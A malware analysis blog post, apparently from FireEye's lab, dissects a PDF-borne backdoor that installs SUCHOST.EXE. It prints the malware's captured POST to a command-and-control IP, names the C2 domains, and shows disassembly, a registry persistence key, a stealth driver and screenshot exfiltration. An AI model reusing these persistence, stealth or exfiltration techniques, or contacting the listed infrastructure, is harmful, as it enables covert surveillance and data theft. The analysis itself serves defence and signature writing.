FireEye Malware Intelligence Lab

There's no doubt this executable was embedded inside the PDF file, as no external resources were ever accessed to download and execute this binary. Immediately after, I observed the following outbound communication on TCP/4000.

POST http://59.175.238.82/*eef2e2cf*/kmpyokf HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-tw
Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 59.175.238.82
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache

. ...Q=....!(Z...i.8o.

Did you guys notice anything...? The Carriage return is missing between the 'Accept-Encoding' and 'User-Agent' headers - this small typo by the malware author can be used to develop a very good outbound signature! Give it a try :)

For further confirmation, I looked into the malware code . It was true indeed, here is the code snippet which is formulating this POST request incorrectly.

.text:10005A96                 push    offset aAccept_0 ; "Accept: */*\r\n"
.text:10005A9B                 mov     ecx, [ebp+Dest]
.text:10005A9E                 push    ecx             ; Dest
.text:10005A9F                 call    strcat
.text:10005AA4                 add     esp, 8
.text:10005AA7                 push    offset aContentTypeApp ; "Content-Type: application/x-www-form-ur"...
.text:10005AAC                 mov     edx, [ebp+Dest]
.text:10005AAF                 push    edx             ; Dest
.text:10005AB0                 call    strcat
.text:10005AB5                 add     esp, 8
.text:10005AB8                 push    offset aAcceptLanguage ; "Accept-Language: zh-tw\r\n"
.text:10005ABD                 mov     eax, [ebp+Dest]
.text:10005AC0                 push    eax             ; Dest
.text:10005AC1                 call    strcat
.text:10005AC6                 add     esp, 8
.text:10005AC9                 push    offset aAcceptEncoding ; "Accept-Encoding: gzip, deflate" [MISSING \r\n]
.text:10005ACE                 mov     ecx, [ebp+Dest]
.text:10005AD1                 push    ecx             ; Dest
.text:10005AD2                 call    strcat
.text:10005AD7                 add     esp, 8
.text:10005ADA                 push    offset aUserAgentMozil ; "User-Agent: Mozilla/4.0 (compatible; MS"...
.text:10005ADF                 mov     edx, [ebp+Dest]
.text:10005AE2                 push    edx             ; Dest

Another thing to note here is that ip (59.175.238.82) was not hard coded in the 'POST' request, but instead was resolved with an earlier DNS look up to CnC domain 'webswan.33iqst.com' and/or 'webswan.zurge.org'.

WHOIS lookup for the CnC domains and IP looks like this:

What's inside SUCHOST.EXE?  Upon execution, this executable adds itself in the start up by adding the following registry key.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components with StubPath = %SYSTEM32/SUCHOST.EXE -s

This will make sure that SUCHOST.exe should run at least once for each logged-in user. Furthermore, it drops two files onto the file system,  %SYSTEM32%/bswan.dll (628b14fd6a740b0981d76bebc6dd965e) and %SYSTEM32%/drivers/sysmon.sys (d41fdf70072792e49054541a93a5cadf ).

sysmon.sys is installed as a driver service under the TDI group, and its purpose is to be sure the other malware components remain stealthy, by hiding the malware related files and registry keys.

I got an important clue about the malware underlying functionality when I started investigating an exported function 'GetMoniter' [sic] within bswan.dll.  The purpose of this exported function and inner routine was to capture the user's desktop by using screen shots, and to send it over to the remote server . These screen shots are not sent to the remote server in plain BMP format, but are further compressed via Windows cabinet APIS like FCICreate, FCIAdd etc. Compressing screen shots in the cabinet format (.cab) makes them smaller and much harder to identify.

Another interesting nugget found during the analysis was a piece of code inside bswan.dll which tries to detect browser's configured proxy settings to let the malware communicate to its CnC, even behind proxy firewalls. This shows that malware authors are well aware of network configurations in big enterprises and are planning to target them specifically.

My investigation of this malware is not over yet. I'll keep on updating this article with new findings.

In the end of these articles, I like to talk about some of the mitigating factors.  Unfortunately, here, I have nothing much to say.

Here is the summary of AV detection so far (based on VT data) :

PDF File          =  7/41 (17.07%)

SUCHOST.EXE = 9/36 (25.00%)

sysmon.sys     = 2/40 (5.00%)

bswan.dll        =  5/41 (12.20%)

Even disabling the Javascript engine inside Adobe Reader won't solve this problem.  The best defense is to be careful before opening any files coming from untrusted sources (although in a drive-by case this won't help either), and generally be especially careful while browsing.  If none of these suggestions work for you, one might choose to do what I just did..

One easy step and you are safe ..:)

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM